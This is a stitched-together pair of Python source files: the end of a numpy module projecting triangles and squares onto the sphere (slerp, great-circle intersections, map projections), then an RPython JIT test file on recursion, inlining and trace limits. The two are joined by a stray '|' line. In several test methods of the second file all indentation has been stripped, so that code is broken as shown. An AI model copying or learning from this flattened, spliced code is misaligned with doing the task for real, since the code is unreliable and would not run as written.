           [ 0.21874817,  0.81375629,  0.53847   ],
           [ 0.        ,  0.63544017,  0.77215011]])
    """
    base_pts = xmath.normalize(base_pts)
    # total solid angle of the triangle; the areal coordinates split it
    # into the three sub-triangle areas area_i
    area = xmath.triangle_solid_angle(base_pts[0], base_pts[1], base_pts[2])
    area_i = bary * area
    base_pts_iplus1 = np.roll(base_pts, -1, axis=0)
    base_pts_iplus2 = np.roll(base_pts, 1, axis=0)
    #FIXME whytf is this commented statement not equivalent to below?
    # L = ((1 + np.cos(area_i))[:, np.newaxis]*
    #      np.cross(base_pts_iplus1, base_pts_iplus2) -
    #      np.sin(area_i)[:, np.newaxis]*
    #      (base_pts_iplus1 + base_pts_iplus2)).transpose((0,2,1))
    # One row of the linear system per vertex: each row combines the
    # other two vertices and the corresponding sub-area.
    L0 = ((1 + np.cos(area_i[..., 0]))[..., np.newaxis]*
          np.cross(base_pts[1], base_pts[2]) -
          np.sin(area_i[..., 0])[..., np.newaxis]*
          (base_pts[1] + base_pts[2]))
    L1 = ((1 + np.cos(area_i[..., 1]))[..., np.newaxis]*
          np.cross(base_pts[2], base_pts[0]) -
          np.sin(area_i[..., 1])[..., np.newaxis]*
          (base_pts[2] + base_pts[0]))
    L2 = ((1 + np.cos(area_i[..., 2]))[..., np.newaxis]*
          np.cross(base_pts[0], base_pts[1]) -
          np.sin(area_i[..., 2])[..., np.newaxis]*
          (base_pts[0] + base_pts[1]))
    L = np.stack([L0, L1, L2], axis=-2)
    h = np.sin(area_i)*(1 + np.sum(base_pts_iplus1*base_pts_iplus2, axis=-1))
    # solve the per-point 3x3 system L x = h for the surface point
    return np.linalg.solve(L, h)
def triangles_method2(lindex, base_pts, freq):
    """Triangles of method 2
    Args:
        lindex: Array, shape (..., 3). Linear indexes (should correspond
            to freq)
        base_pts: Array, shape (3, ..., 3). Coordinates of the triangle.
            Should be in counterclockwise order to maintain orientation.
        freq: 2-tuple. Frequency of the subdivision.
    Returns:
        Array of shape (..., 3, 3)
    >>> np.round(triangles_method2(_TEST_TRI_LINDEX[1:3], _TEST_SKEW_TRI,
    ...                            _TEST_FREQ), 6)
    array([[[ 0.205392,  0.183498,  0.051016],
            [ 0.34558 ,  0.317059,  0.10024 ],
            [ 0.098942,  0.085439,  0.03013 ]],
    <BLANKLINE>
           [[ 0.283136,  0.377856,  0.038599],
            [ 0.24816 ,  0.339397,  0.042048],
            [ 0.152133,  0.199126,  0.028172]]])
    """
    n, m = freq
    # endpoints of the subdivision lines, slerped along the triangle edges
    frame = breakdown.frame_triangle(n, m, base_pts=base_pts,
                                     interp=xmath.slerp)
    #get the normal to the great circle corresponding to the lines
    #don't need to normalize this
    gc_normals = np.cross(frame[..., 0, :], frame[..., 1, :])
    index = np.arange(3)
    # pick, for each point, the great circle selected by its linear index
    # in each of the three line directions
    pairs = gc_normals[index, lindex[:, index]]
    #intersection of great circles = cross product of normals
    ptx = np.cross(pairs, np.roll(pairs, 2, axis=1))
    # cross product could give the point we want or its negative.
    # test to see if the points are on the correct side of the sphere
    # take the dot product of these vectors with the center of the
    # base face. if it's positive, it's right, if not, negate it
    center = np.sum(base_pts, axis=0)#don't need to normalize this
    sign_correct = np.sum(center*ptx, axis=-1, keepdims=True) >= 0
    result = np.where(sign_correct, ptx, -ptx)
    return result
def tri_intersections(lindex, base_pts, freq, tweak=False):
    """Transforms a triangle to a spherical triangle using the method of
    intersections
    Args:
        lindex: Array, shape (..., 3). Linear indexes (should correspond
            to freq)
        base_pts: Array, shape (3, ..., 3). Coordinates of the triangle.
            Should be in counterclockwise order to maintain orientation.
        freq: 2-tuple. Frequency of the subdivision.
        tweak: Whether to normalize the points of the triangle before
            taking their centroid. By default false.
    Returns:
        Array of shape (..., 3)
    >>> tri_intersections(_TEST_TRI_LINDEX, _TEST_SKEW_TRI, _TEST_FREQ,
    ...                   tweak=True)
    array([[ 0.8       ,  0.6       ,  0.        ],
           [ 0.73045891,  0.65102869,  0.20524575],
           [ 0.59608649,  0.79682621,  0.09756895],
           [ 0.4472136 ,  0.89442719,  0.        ],
           [ 0.6127549 ,  0.67069951,  0.41582597],
           [ 0.46297244,  0.82965693,  0.30963537]])
    """
    a, b = freq
    corners = triangles_method2(lindex, base_pts, freq)
    if tweak:
        corners = xmath.normalize(corners)
    result = corners.mean(axis=1)
    # The base triangle's own vertices are known exactly; patch them in
    # over the averaged intersection points.
    vertex_lindexes = [(0, a, a + b), (a + b, 0, a), (a, a + b, 0)]
    for vertex, (l0, l1, l2) in enumerate(vertex_lindexes):
        mask = ((lindex[:, 0] == l0) & (lindex[:, 1] == l1) &
                (lindex[:, 2] == l2))
        result[mask] = base_pts[vertex]
    return result
#squares -> spherical quadrilateral
def square_naive_slerp(xy, base_pts):
    """
    Naive slerp (spherical linear interpolation) on a spherical square.
    Args:
        xy: Array, shape [..., 2]. XY coordinates on the square.
        base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        An array of shape [..., 3], representing points in 3d-space.
    >>> np.round(square_naive_slerp(_TEST_XY, _TEST_EQ_Q), 6)
    array([[ 0.707107,  0.      ,  0.707107],
           [ 0.      ,  0.707107,  0.707107],
           [-0.707107,  0.      ,  0.707107],
           [ 0.      , -0.707107,  0.707107],
           [ 0.408248,  0.408248,  0.816497],
           [ 0.      ,  0.      ,  0.845299],
           [-0.408248, -0.408248,  0.816497],
           [ 0.546343,  0.252311,  0.798654],
           [ 0.164878, -0.164878,  0.840669],
           [-0.252311, -0.546343,  0.798654]])
    """
    angle = xmath.central_angle_equilateral(base_pts)
    x, y = xy[..., 0], xy[..., 1]
    # bilinear corner weights, pushed through the slerp weighting
    corner_wts = np.stack([(1-x)*(1-y), x*(1-y), x*y, (1-x)*y], axis=-1)
    mat = np.sin(corner_wts*angle) / np.sin(angle)
    return mat.dot(base_pts)
def square_naive_slerp_2(xy, base_pts):
    """
    Variant naive slerp on a spherical square.
    Args:
        xy: Array, shape [..., 2]. XY coordinates on the square.
        base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        An array of shape [..., 3], representing points in 3d-space.
    >>> np.round(square_naive_slerp_2(_TEST_XY, _TEST_EQ_Q), 6)
    array([[ 0.707107,  0.      ,  0.707107],
           [ 0.      ,  0.707107,  0.707107],
           [-0.707107,  0.      ,  0.707107],
           [ 0.      , -0.707107,  0.707107],
           [ 0.408248,  0.408248,  0.816497],
           [-0.      , -0.      ,  0.942809],
           [-0.408248, -0.408248,  0.816497],
           [ 0.546343,  0.252311,  0.798654],
           [ 0.169759, -0.169759,  0.922206],
           [-0.252311, -0.546343,  0.798654]])
    """
    angle = xmath.central_angle_equilateral(base_pts)
    x, y = xy[..., 0], xy[..., 1]
    # slerp factors along each axis and their complements
    sx, sy = np.sin(x*angle), np.sin(y*angle)
    cx, cy = np.sin((1-x)*angle), np.sin((1-y)*angle)
    weights = np.stack([cx*cy, sx*cy, sx*sy, cx*sy], axis=-1)
    mat = weights / np.sin(angle)**2
    return mat.dot(base_pts)
def _square_slerp(xy, base_pts):
    """
    Helper function for square_slerp. This does the slerp, and then
    square_slerp averages the two orientations together.
    Args:
        xy: Array, shape [..., 2]. XY coordinates on the square.
        base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        An array of shape [..., 3], representing points in 3d-space.
    >>> _square_slerp(_TEST_XY[:, np.newaxis], _TEST_SKEW_Q)
    array([[ 0.70710678,  0.        ,  0.70710678],
           [ 0.        ,  0.70710678,  0.70710678],
           [-0.70710678,  0.        ,  0.70710678],
           [ 0.        , -1.        ,  0.        ],
           [ 0.40824829,  0.40824829,  0.81649658],
           [-0.06780818, -0.22086837,  0.97294358],
           [-0.5       , -0.70710678,  0.5       ],
           [ 0.54634285,  0.25231132,  0.79865417],
           [ 0.1721895 , -0.48808406,  0.85564287],
           [-0.32101976, -0.89100652,  0.32101976]])
    """
    p0, p1, p2, p3 = base_pts[0], base_pts[1], base_pts[2], base_pts[3]
    x, y = xy[..., 0], xy[..., 1]
    # slerp along the two x-direction edges, then between them in y
    edge01 = xmath.slerp(p0, p1, x)
    edge32 = xmath.slerp(p3, p2, x)
    return xmath.slerp(edge01, edge32, y)
def square_slerp(xy, base_pts):
    """Transforms a square in [0,1]^2 to a spherical quadrilateral
    defined by base_pts, using spherical linear interpolation
    Args:
        xy: Array, shape [..., 2]. XY coordinates on the square.
        base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
            Should be in counterclockwise order to maintain orientation.
    Returns:
        An array of shape [..., 3], representing points in 3d-space.
    >>> square_slerp(_TEST_XY[:, np.newaxis], _TEST_SKEW_Q)
    array([[ 0.70710678,  0.        ,  0.70710678],
           [ 0.        ,  0.70710678,  0.70710678],
           [-0.70710678,  0.        ,  0.70710678],
           [ 0.        , -1.        ,  0.        ],
           [ 0.40824829,  0.40824829,  0.81649658],
           [ 0.        , -0.2213779 ,  0.9751881 ],
           [-0.5       , -0.70710678,  0.5       ],
           [ 0.54634285,  0.25231132,  0.79865417],
           [ 0.21865594, -0.4721394 ,  0.85397539],
           [-0.32101976, -0.89100652,  0.32101976]])
    """
    # nested slerp is not symmetric in x and y, so evaluate both
    # orientations and normalize their sum
    first = _square_slerp(xy, base_pts)
    second = _square_slerp(xy[..., ::-1], base_pts[[0, 3, 2, 1]])
    return xmath.normalize(first + second)
def square_intersections(lindex, base_pts, freq):
    """Transforms a square to a spherical quadrilateral using the method of
    intersections
    Args:
        lindex: Array, shape (..., 2). Linear indexes (should correspond
            to freq)
        base_pts: Array, shape (4, ..., 3). Coordinates of the quadrilateral.
            Should be in counterclockwise order to maintain orientation.
        freq: 2-tuple. Frequency of the subdivision.
    Returns:
        Array of shape (..., 3)
    >>> square_intersections(_TEST_Q_LINDEX, _TEST_SKEW_Q, _TEST_FREQ)
    array([[ 0.70710678,  0.        ,  0.70710678],
           [ 0.43240784, -0.07811493,  0.54287903],
           [ 0.39952941,  0.13802823,  0.63415567],
           [ 0.28927895,  0.28927895,  0.57855789],
           [ 0.32664074, -0.46193977,  0.32664074],
           [ 0.4267767 , -0.25      ,  0.78033009]])
    """
    a, b = freq
    # endpoints of the subdivision lines on the flat square, slerped
    # onto the spherical quadrilateral
    preframe = breakdown.frame_square(a, b)
    frame = _square_slerp(preframe[..., np.newaxis, :], base_pts)
    # normal of the great circle through each pair of endpoints
    gc_normals = np.cross(frame[..., 0, :], frame[..., 1, :])
    index = np.arange(2)
    pairs = gc_normals[index, lindex[:, index]]
    #intersection of great circles = cross product of normals
    ptx = np.cross(pairs[:, 0], pairs[:, 1])
    # cross product could give the point we want or its negative.
    # test to see if the points are on the correct side of the sphere
    # take the dot product of these vectors with the center of the
    # base face. if it's positive, it's right, if not, negate it
    center = np.sum(base_pts, axis=0)#don't need to normalize this
    sign_correct = np.sum(center*ptx, axis=-1, keepdims=True) >= 0
    result = np.where(sign_correct, ptx, -ptx)
    # the four corner vertices are known exactly; patch them in
    result[(lindex[:, 0] == b) & (lindex[:, 1] == 0)] = base_pts[0]
    result[(lindex[:, 0] == a + b) & (lindex[:, 1] == b)] = base_pts[1]
    result[(lindex[:, 0] == a) & (lindex[:, 1] == a + b)] = base_pts[2]
    result[(lindex[:, 0] == 0) & (lindex[:, 1] == a)] = base_pts[3]
    return result
#extra crap
def bary_tri(tri, vertices):
    """Transforms a triangle back into barycentric coordinates.
    Args:
        tri: Triangle to calculate barycentric coordinates with respect to.
        vertices: Array of vertices
    Returns:
        Array of barycentric coordinates
    >>> np.round(np.abs(bary_tri(_TEST_TRI_PTS, _TEST_SKEW_TRI)), 6)
    array([[ 1.      ,  0.      ,  0.      ],
           [ 0.      ,  1.      ,  0.      ],
           [ 0.      ,  0.      ,  1.      ],
           [ 0.5     ,  0.5     ,  0.      ],
           [ 0.      ,  0.5     ,  0.5     ],
           [ 0.5     ,  0.      ,  0.5     ],
           [ 0.333333,  0.333333,  0.333333]])
    """
    def _augment(pts):
        # append a homogeneous coordinate of 1 to each point
        fill = np.ones(pts.shape[:-1] + (1,))
        return np.concatenate([pts, fill], axis=-1)
    #couldn't make np.linalg.lstsq cooperate here.
    #this should be OK numerically
    return _augment(tri).dot(np.linalg.pinv(_augment(vertices)))
def to_sph_areal_coords(pts, triangle):
    """Given a spherical triangle and points within it, returns the
    spherical areal coordinates of the points with respect to the triangle.
    Args:
        pts: Array with shape (..., 3). Points to convert.
        triangle: Array with shape (3, 3). Vertices of the triangle.
    Returns:
        Array of spherical areal coordinates
    >>> to_sph_areal_coords(_TEST_SPHERE_PTS, _TEST_SKEW_TRI)
    array([[ 1.        ,  0.        ,  0.        ],
           [ 0.        ,  1.        ,  0.        ],
           [ 0.        ,  0.        ,  1.        ],
           [ 0.5       ,  0.5       ,  0.        ],
           [ 0.        ,  0.5595371 ,  0.4404629 ],
           [ 0.5595371 ,  0.        ,  0.4404629 ],
           [ 0.36751409,  0.36751409,  0.26497182]])
    """
    total = xmath.triangle_solid_angle(triangle[0], triangle[1], triangle[2])
    # solid angle of the sub-triangle opposite each vertex
    sub = xmath.triangle_solid_angle(pts[:, np.newaxis],
                                     np.roll(triangle, 1, axis=0),
                                     np.roll(triangle, -1, axis=0))
    return sub/total
def project_sphere(sphcoords, zfunc=np.arcsin, scale=180 / np.pi):
    """
    Projects 3d coordinates on the sphere onto a 2d rectangle.
    Corresponds to a number of rectangular map projections.
    Args:
        sphcoords: An array of shape (..., 3).
        zfunc: A function to transform the z-values on the sphere. By
            default this is np.arcsin, which makes the projection a
            "rectangular" map projection. Use zfunc = lambda x: x
            for an equal-area projection, and np.arctanh for Mercator.
        scale: A scale function, applied to both coordinates of the result.
            By default this is 180/np.pi, to
            transform radians into degrees.
    Returns:
        The 2d rectangular coordinates, in an array of shape (..., 2).
        By default, returns latitude and longitude, but if zfunc is
        specified, the second coordinate will be whatever the function
        transforms it to be.
    >>> project_sphere(_TEST_SPHERE_PTS)
    array([[ 36.86989765,   0.        ],
           [ 90.        ,   0.        ],
           [  0.        ,  90.        ],
           [ 63.43494882,   0.        ],
           [ 90.        ,  45.        ],
           [ 36.86989765,  45.        ],
           [ 63.43494882,  29.20593225]])
    """
    # first coordinate: longitude from x and y; second: transformed z
    longitude = np.arctan2(sphcoords[..., 1], sphcoords[..., 0])
    latitude = zfunc(sphcoords[..., 2])
    return np.stack([longitude, latitude], axis=-1) * scale
#parallel projections
def parallel_exact(pts, normal):
    """Projects points exactly onto the sphere parallel to the normal vector.
    Args:
        pts: Points to project
        normal: Normal vector
    >>> center = np.array([0, 0, 1])
    >>> pts = np.array([[0.5, 0.5, 0],
    ...                 [1, 0, 0]])
    >>> parallel_exact(pts, center)
    array([[ 0.        ,  0.        ,  0.70710678],
           [ 0.        ,  0.        ,  0.        ]])
    """
    dot_pn = np.sum(pts * normal, axis=-1)
    sq_len = norm(pts, axis=-1)**2
    # clamp the discriminant at 0 so points already on (or numerically
    # just outside) the sphere get a zero displacement
    disc = np.fmax(1 + dot_pn**2 - sq_len, 0)
    displacement = -dot_pn + np.sqrt(disc)
    return displacement[..., np.newaxis] * normal
def parallel_approx(pts, normal):
    """Approximately projects points onto the sphere parallel to the
    normal vector.
    Args:
        pts: Points to project
        normal: Normal vector
    >>> center = np.array([0, 0, 1])
    >>> pts = np.array([[0.5, 0.5, 0],
    ...                 [1, 0, 0]])
    >>> parallel_approx(pts, center)
    array([[ 0.        ,  0.        ,  0.29289322],
           [ 0.        ,  0.        ,  0.        ]])
    """
    # displacement is simply how far each point falls short of unit length
    shortfall = 1 - norm(pts, axis=-1)
    return shortfall[..., np.newaxis] * normal
def parallel(pts, normal, exact=True):
    """Projects points onto the sphere parallel to the normal vector.
    Args:
        pts: Points to project
        normal: Normal vector
        exact: Whether to project exactly or approximately.
            Defaults to exact (True).
    """
    projector = parallel_exact if exact else parallel_approx
    return projector(pts, normal)
# Dispatch tables keyed on face shape (3 = triangle, 4 = square); every
# entry is a callable (bkdn, base_pts, freq, tweak) -> coordinates.
_FLAT = {3: lambda bkdn, base_pts, freq, tweak: tri_bary(bkdn.coord, base_pts),
         4: lambda bkdn, base_pts, freq, tweak:
            square_to_quad(bkdn.coord[:, np.newaxis], base_pts)}
_SLERP = {3: lambda bkdn, base_pts, freq, tweak: tri_naive_slerp(bkdn.coord,
                                                                 base_pts),
          4: lambda bkdn, base_pts, freq, tweak:
             square_naive_slerp(bkdn.coord, base_pts)}
_SLERP2 = {3: lambda bkdn, base_pts, freq, tweak: tri_naive_slerp(bkdn.coord,
                                                                  base_pts),
           4: lambda bkdn, base_pts, freq, tweak:
              square_naive_slerp_2(bkdn.coord, base_pts)}
_OTHER = {3: lambda bkdn, base_pts, freq, tweak: tri_areal(bkdn.coord,
                                                           base_pts),
          4: lambda bkdn, base_pts, freq, tweak:
             square_slerp(bkdn.coord[:, np.newaxis], base_pts)}
_GC = {3: lambda bkdn, base_pts, freq, tweak:
          tri_intersections(bkdn.lindex, base_pts, freq, tweak),
       4: lambda bkdn, base_pts, freq, tweak:
          square_intersections(bkdn.lindex, base_pts, freq)}
_DISK = {3: _tri_disk,
         4: _sq_disk}
# Public registry described in the module docstring: family name -> table.
PROJECTIONS = {'flat': _FLAT,
               'nslerp': _SLERP,
               'nslerp2': _SLERP2,
               'other': _OTHER,
               'gc': _GC,
               'disk': _DISK}
# Projection families compatible with parallel projection.
PARALLEL = ['nslerp', 'nslerp2', 'disk']
|
|
import py
from rpython.rlib.jit import JitDriver, hint, set_param
from rpython.rlib.jit import unroll_safe, dont_look_inside, promote
from rpython.rlib.objectmodel import we_are_translated
from rpython.rlib.debug import fatalerror
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.jit.codewriter.policy import StopAtXPolicy
from rpython.rtyper.annlowlevel import hlstr
from rpython.jit.metainterp.warmspot import get_stats
from rpython.jit.backend.llsupport import codemap
class RecursiveTests:
    def test_simple_recursion(self):
        # f() decrements n until it meets m, then recurses through main();
        # even with optimizations disabled, the recorded history must
        # contain no residual call_i operations.
        myjitdriver = JitDriver(greens=[], reds=['n', 'm'])
        def f(n):
            m = n - 2
            while True:
                myjitdriver.jit_merge_point(n=n, m=m)
                n -= 1
                if m == n:
                    return main(n) * 2
                myjitdriver.can_enter_jit(n=n, m=m)
        def main(n):
            if n > 0:
                return f(n+1)
            else:
                return 1
        res = self.meta_interp(main, [20], enable_opts='')
        assert res == main(20)
        self.check_history(call_i=0)
    def test_simple_recursion_with_exc(self):
        # Same shape as test_simple_recursion, but the recursion is cut
        # short at n == 10 by raising Error, which the recursive call
        # site catches and turns into the value 2.
        myjitdriver = JitDriver(greens=[], reds=['n', 'm'])
        class Error(Exception):
            pass
        def f(n):
            m = n - 2
            while True:
                myjitdriver.jit_merge_point(n=n, m=m)
                n -= 1
                if n == 10:
                    raise Error
                if m == n:
                    try:
                        return main(n) * 2
                    except Error:
                        return 2
                myjitdriver.can_enter_jit(n=n, m=m)
        def main(n):
            if n > 0:
                return f(n+1)
            else:
                return 1
        res = self.meta_interp(main, [20], enable_opts='')
        assert res == main(20)
    def test_recursion_three_times(self):
        # Every iteration of f() recurses into main(); checks the number
        # of compiled-loop entries stays bounded (at most 11 for n=10).
        myjitdriver = JitDriver(greens=[], reds=['n', 'm', 'total'])
        def f(n):
            m = n - 3
            total = 0
            while True:
                myjitdriver.jit_merge_point(n=n, m=m, total=total)
                n -= 1
                total += main(n)
                if m == n:
                    return total + 5
                myjitdriver.can_enter_jit(n=n, m=m, total=total)
        def main(n):
            if n > 0:
                return f(n)
            else:
                return 1
        # print the pure-Python values for reference when run directly
        print
        for i in range(1, 11):
            print '%3d %9d' % (i, f(i))
        res = self.meta_interp(main, [10], enable_opts='')
        assert res == main(10)
        self.check_enter_count_at_most(11)
    def test_bug_1(self):
        # opaque() is kept out of the traced code by StopAtXPolicy; at one
        # specific (n, i) it re-enters f() 20 more times from outside the
        # trace, which used to trigger a bug.
        myjitdriver = JitDriver(greens=[], reds=['n', 'i', 'stack'])
        def opaque(n, i):
            if n == 1 and i == 19:
                for j in range(20):
                    res = f(0)     # recurse repeatedly, 20 times
                    assert res == 0
        def f(n):
            stack = [n]
            i = 0
            while i < 20:
                myjitdriver.can_enter_jit(n=n, i=i, stack=stack)
                myjitdriver.jit_merge_point(n=n, i=i, stack=stack)
                opaque(n, i)
                i += 1
            return stack.pop()
        res = self.meta_interp(f, [1], enable_opts='', repeat=2,
                               policy=StopAtXPolicy(opaque))
        assert res == 1
    def get_interpreter(self, codes):
        # Builds a tiny bytecode interpreter over `codes` for the inlining
        # tests: "0" increments n, "1" jumps back two ops (a loop, exiting
        # with 42 once n > 20), "2" calls into codes[1] starting at
        # position 1, "3" returns n.
        ADD = "0"
        JUMP_BACK = "1"
        CALL = "2"
        EXIT = "3"
        def getloc(i, code):
            return 'code="%s", i=%d' % (code, i)
        jitdriver = JitDriver(greens = ['i', 'code'], reds = ['n'],
                              get_printable_location = getloc)
        def interpret(codenum, n, i):
            code = codes[codenum]
            while i < len(code):
                jitdriver.jit_merge_point(n=n, i=i, code=code)
                op = code[i]
                if op == ADD:
                    n += 1
                    i += 1
                elif op == CALL:
                    # recursive call into the subcode
                    n = interpret(1, n, 1)
                    i += 1
                elif op == JUMP_BACK:
                    if n > 20:
                        return 42
                    i -= 2
                    jitdriver.can_enter_jit(n=n, i=i, code=code)
                elif op == EXIT:
                    return n
                else:
                    raise NotImplementedError
            return n
        return interpret
def test_inline(self):
code = "021"
subcode = "00"
codes = [code, subcode]
f = self.get_interpreter(codes)
assert self.meta_interp(f, [0, 0, 0], enable_opts='') == 42
self.check_resops(call_may_force_i=1, int_add=1, call=0)
assert self.meta_interp(f, [0, 0, 0], enable_opts='',
inline=True) == 42
self.check_resops(call=0, int_add=2, call_may_force_i=0,
guard_no_exception=0)
def test_inline_jitdriver_check(self):
code = "021"
subcode = "100"
codes = [code, subcode]
f = self.get_interpreter(codes)
assert self.meta_interp(f, [0, 0, 0], enable_opts='',
inline=True) == 42
# the call is fully inlined, because we jump to subcode[1], thus
# skipping completely the JUMP_BACK in subcode[0]
self.check_resops(call=0, call_may_force=0, call_assembler=0)
def test_guard_failure_in_inlined_function(self):
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
get_printable_location=p)
def f(code, n):
pc = 0
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
n = f("---i---", n)
elif op == "i":
if n % 5 == 1:
return n
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0)
pc = 0
continue
else:
assert 0
pc += 1
return n
def main(n):
return f("c-l", n)
print main(100)
res = self.meta_interp(main, [100], enable_opts='', inline=True)
assert res == 0
def test_guard_failure_and_then_exception_in_inlined_function(self):
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n', 'flag'],
get_printable_location=p)
def f(code, n):
pc = 0
flag = False
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc, flag=flag)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
try:
n = f("---ir---", n)
except Exception:
return n
elif op == "i":
if n < 200:
flag = True
elif op == "r":
if flag:
raise Exception
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0, flag=flag)
pc = 0
continue
else:
assert 0
pc += 1
return n
def main(n):
return f("c-l", n)
print main(1000)
res = self.meta_interp(main, [1000], enable_opts='', inline=True)
assert res == main(1000)
def test_exception_in_inlined_function(self):
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
get_printable_location=p)
class Exc(Exception):
pass
def f(code, n):
pc = 0
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
try:
n = f("---i---", n)
except Exc:
pass
elif op == "i":
if n % 5 == 1:
raise Exc
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0)
pc = 0
continue
else:
assert 0
pc += 1
return n
def main(n):
return f("c-l", n)
res = self.meta_interp(main, [100], enable_opts='', inline=True)
assert res == main(100)
    def test_recurse_during_blackholing(self):
        # this passes, if the blackholing shortcut for calls is turned off
        # it fails, it is very delicate in terms of parameters,
        # bridge/loop creation order
        def p(pc, code):
            code = hlstr(code)
            return "%s %d %s" % (code, pc, code[pc])
        myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
                                get_printable_location=p)
        def f(code, n):
            pc = 0
            while pc < len(code):
                myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
                op = code[pc]
                if op == "-":
                    n -= 1
                elif op == "c":
                    # recursion happens only for a few specific values of n
                    if n < 70 and n % 3 == 1:
                        n = f("--", n)
                elif op == "l":
                    if n > 0:
                        myjitdriver.can_enter_jit(n=n, code=code, pc=0)
                        pc = 0
                        continue
                else:
                    assert 0
                pc += 1
            return n
        def main(n):
            # low threshold/eagerness so compilation kicks in mid-run
            set_param(None, 'threshold', 3)
            set_param(None, 'trace_eagerness', 5)
            return f("c-l", n)
        expected = main(100)
        res = self.meta_interp(main, [100], enable_opts='', inline=True)
        assert res == expected
    def check_max_trace_length(self, length):
        # Assert that no compiled loop (nor the suboperations attached to
        # its guards) exceeds `length` operations, with a small slack.
        for loop in get_stats().loops:
            assert len(loop.operations) <= length + 5 # because we only check once per metainterp bytecode
            for op in loop.operations:
                if op.is_guard() and hasattr(op.getdescr(), '_debug_suboperations'):
                    assert len(op.getdescr()._debug_suboperations) <= length + 5
def test_inline_trace_limit(self):
myjitdriver = JitDriver(greens=[], reds=['n'])
def recursive(n):
if n > 0:
return recursive(n - 1) + 1
return 0
def loop(n):
set_param(myjitdriver, "threshold", 10)
pc = 0
while n:
myjitdriver.can_enter_jit(n=n)
myjitdriver.jit_merge_point(n=n)
n = recursive(n)
n -= 1
return n
TRACE_LIMIT = 66
res = self.meta_interp(loop, [100], enable_opts='', inline=True, trace_limit=TRACE_LIMIT)
assert res == 0
self.check_max_trace_length(TRACE_LIMIT)
self.check_enter_count_at_most(10) # maybe
self.check_aborted_count(6)
def test_trace_limit_bridge(self):
def recursive(n):
if n > 0:
return recursive(n - 1) + 1
return 0
myjitdriver = JitDriver(greens=[], reds=['n'])
def loop(n):
set_param(None, "threshold", 4)
set_param(None, "trace_eagerness", 2)
while n:
myjitdriver.can_enter_jit(n=n)
myjitdriver.jit_merge_point(n=n)
if n % 5 == 0:
n -= 1
if n < 50:
n = recursive(n)
n -= 1
return n
TRACE_LIMIT = 20
res = self.meta_interp(loop, [100], enable_opts='', inline=True, trace_limit=TRACE_LIMIT)
self.check_max_trace_length(TRACE_LIMIT)
self.check_aborted_count(8)
self.check_enter_count_at_most(30)
def test_trace_limit_with_exception_bug(self):
myjitdriver = JitDriver(greens=[], reds=['n'])
@unroll_safe
def do_stuff(n):
while n > 0:
n -= 1
raise ValueError
def loop(n):
pc = 0
while n > 80:
myjitdriver.can_enter_jit(n=n)
myjitdriver.jit_merge_point(n=n)
try:
do_stuff(n)
except ValueError:
# the trace limit is checked when we arrive here, and we
# have the exception still in last_exc_value_box at this
# point -- so when we abort because of a trace too long,
# the exception is passed to the blackhole interp and
# incorrectly re-raised from here
pass
n -= 1
return n
TRACE_LIMIT = 66
res = self.meta_interp(loop, [100], trace_limit=TRACE_LIMIT)
assert res == 80
    def test_max_failure_args(self):
        """failargs_limit must make tracing abort instead of building huge failure descrs."""
        FAILARGS_LIMIT = 10
        jitdriver = JitDriver(greens = [], reds = ['i', 'n', 'o'])
        class A(object):
            def __init__(self, i0, i1, i2, i3, i4, i5, i6, i7, i8, i9):
                self.i0 = i0
                self.i1 = i1
                self.i2 = i2
                self.i3 = i3
                self.i4 = i4
                self.i5 = i5
                self.i6 = i6
                self.i7 = i7
                self.i8 = i8
                self.i9 = i9
        def loop(n):
            i = 0
            o = A(0, 1, 2, 3, 4, 5, 6, 7, 8, 9)
            while i < n:
                jitdriver.can_enter_jit(o=o, i=i, n=n)
                jitdriver.jit_merge_point(o=o, i=i, n=n)
                o = A(i, i + 1, i + 2, i + 3, i + 4, i + 5,
                      i + 6, i + 7, i + 8, i + 9)
                i += 1
            return o
        res = self.meta_interp(loop, [20], failargs_limit=FAILARGS_LIMIT,
                               listops=True)
        self.check_aborted_count(4)
    def test_max_failure_args_exc(self):
        """Same as test_max_failure_args, but leaving the loop via an exception."""
        FAILARGS_LIMIT = 10
        jitdriver = JitDriver(greens = [], reds = ['i', 'n', 'o'])
        class A(object):
            def __init__(self, i0, i1, i2, i3, i4, i5, i6, i7, i8, i9):
                self.i0 = i0
                self.i1 = i1
                self.i2 = i2
                self.i3 = i3
                self.i4 = i4
                self.i5 = i5
                self.i6 = i6
                self.i7 = i7
                self.i8 = i8
                self.i9 = i9
        def loop(n):
            i = 0
            o = A(0, 1, 2, 3, 4, 5, 6, 7, 8, 9)
            while i < n:
                jitdriver.can_enter_jit(o=o, i=i, n=n)
                jitdriver.jit_merge_point(o=o, i=i, n=n)
                o = A(i, i + 1, i + 2, i + 3, i + 4, i + 5,
                      i + 6, i + 7, i + 8, i + 9)
                i += 1
            raise ValueError
        def main(n):
            try:
                loop(n)
                return 1
            except ValueError:
                return 0
        res = self.meta_interp(main, [20], failargs_limit=FAILARGS_LIMIT,
                               listops=True)
        assert not res
        self.check_aborted_count(4)
    def test_set_param_inlining(self):
        """set_param('inlining', ...) must toggle whether recursive calls are inlined."""
